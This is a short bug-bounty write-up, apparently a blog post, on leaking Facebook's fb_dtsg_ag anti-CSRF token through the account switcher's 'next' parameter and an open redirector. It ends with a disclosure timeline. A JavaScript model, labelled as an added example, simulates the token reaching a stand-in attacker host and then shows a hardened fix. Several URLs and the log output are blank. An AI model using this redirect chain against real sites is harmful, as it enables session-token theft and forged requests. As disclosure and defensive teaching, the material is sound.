Stealing Side-Channel Attack Tokens in Facebook Account Switcher

Max Pasqua
Jan 4, 2019 · 2 min read

After receiving an email from Facebook saying that somebody had requested to join my group, I decided to open the link while logged into a different account to see what would happen. I was brought to the “account switcher” page, which looks like this.

Upon hitting continue it would normally log you out and prompt you to log in to the new account. But the URL for the account switcher carried a next parameter controlling where to go after hitting continue. On top of letting you control where the request goes, the page also appends an fb_dtsg_ag token to that destination. fb_dtsg is the anti-CSRF token Facebook attaches to state-changing requests, so anyone who can read the URL the user lands on can read a token that is supposed to stay secret to that user's session.

The next task was to find a way to steal the token once the user hit continue. My goal was to have the token redirected to somewhere I could harvest it, using an embedded iframe to pull the data out of the URL. The only problem was that the next parameter didn't support subdomains, so it could only redirect to

Luckily enough, Facebook has an endpoint where you can put any Facebook domain after the ? and it will redirect there. After a little URL encoding, the final URL looked like this:
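The two ingredients above (an attacker-controlled next parameter that gets the anti-CSRF token appended to it, and a second redirector on the trusted host that the first-hop check does not see) are easy to model. The following is an added example, not Facebook's code or the original post's: the host names, the /redir path, the way the modelled redirector parses its query string, and the token value are all assumptions, chosen only to show why validating the first hop alone leaks the token, and what a hardened continue step looks like.

```javascript
// Added, hypothetical model of the bug class described above. None of this is
// Facebook's code; the hosts, the /redir path and the redirector's behaviour are
// assumptions made for the demonstration.
const TRUSTED_HOST = "social.example";            // stands in for the first-party site
const ATTACKER_HOST = "harvest.attacker.example"; // stands in for the researcher's server
const TOKEN = "tok_0123456789";                   // constructed anti-CSRF token value

// Hop 1 (vulnerable pattern): the "continue" step only checks that `next` stays on
// the trusted host, then appends the anti-CSRF token to whatever URL that is.
function continueUrlVulnerable(next) {
  const target = new URL(next, `https://${TRUSTED_HOST}/`);
  if (target.hostname !== TRUSTED_HOST) {
    throw new Error("next must stay on " + TRUSTED_HOST);
  }
  // String concatenation keeps the raw query intact, as the page describes.
  return target.href + (target.search ? "&" : "?") +
    "fb_dtsg_ag=" + encodeURIComponent(TOKEN);
}

// Hop 2 (modelled, assumed behaviour): an open redirector on the trusted host that
// treats everything after "?" up to the first "&" as the destination and forwards
// the remaining parameters to it. Not a description of any real endpoint.
function openRedirector(url) {
  const u = new URL(url);
  const [dest, ...rest] = u.search.slice(1).split("&");
  const out = new URL(decodeURIComponent(dest));
  for (const kv of rest) {
    const [k, v = ""] = kv.split("=");
    out.searchParams.append(decodeURIComponent(k), decodeURIComponent(v));
  }
  return out.toString();
}

// Follow the chain the way a browser would: trusted-host /redir keeps redirecting,
// anything else is a final landing page. Returns every URL visited.
function followChain(url) {
  const hops = [url];
  let current = url;
  for (let i = 0; i < 5; i++) {
    const u = new URL(current);
    if (u.hostname !== TRUSTED_HOST || u.pathname !== "/redir") break;
    current = openRedirector(current);
    hops.push(current);
  }
  return hops;
}

// What the landing host's access log would record: the fb_dtsg_ag query value,
// or null if the token never reached that host.
function tokenSeenBy(url, host) {
  const u = new URL(url);
  return u.hostname === host ? u.searchParams.get("fb_dtsg_ag") : null;
}

// Hardened continue step: accept only a same-origin relative path, refuse
// scheme-relative and backslash tricks, refuse the redirector itself, and never
// put the token in a URL at all (send it in a POST body or header instead).
function continueUrlSafe(next) {
  if (typeof next !== "string" || !next.startsWith("/") ||
      next.startsWith("//") || next.startsWith("/\\")) {
    throw new Error("next must be a same-origin path");
  }
  const target = new URL(next, `https://${TRUSTED_HOST}/`);
  if (target.origin !== `https://${TRUSTED_HOST}` || target.pathname === "/redir") {
    throw new Error("next resolves off-origin or to a redirector");
  }
  return target.pathname + target.search; // no token in the URL
}

// Walk the attacker's chain once and report whether the token leaked.
function demo() {
  const next = `https://${TRUSTED_HOST}/redir?https://${ATTACKER_HOST}/log`;
  const hops = followChain(continueUrlVulnerable(next));
  return { hops, leaked: tokenSeenBy(hops[hops.length - 1], ATTACKER_HOST) };
}

console.log(demo());
```

The point of the model is that `continueUrlVulnerable` is doing the check it was written to do (the first hop really is on the trusted host); the leak comes from attaching a secret to a URL whose final destination the check cannot see. `continueUrlSafe` closes both halves: the destination is constrained to a path on the same origin, and the token is kept out of URLs entirely, so a future open redirector on the trusted host cannot reopen the bug.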

I clicked continue, then checked my website's log file, which showed this:

Submitted - December 7th, 2018

Triaged - December 10th, 2018

Team asks for verification of fix - January 3rd, 2019

Bounty awarded ($1000) - January 4th, 2019
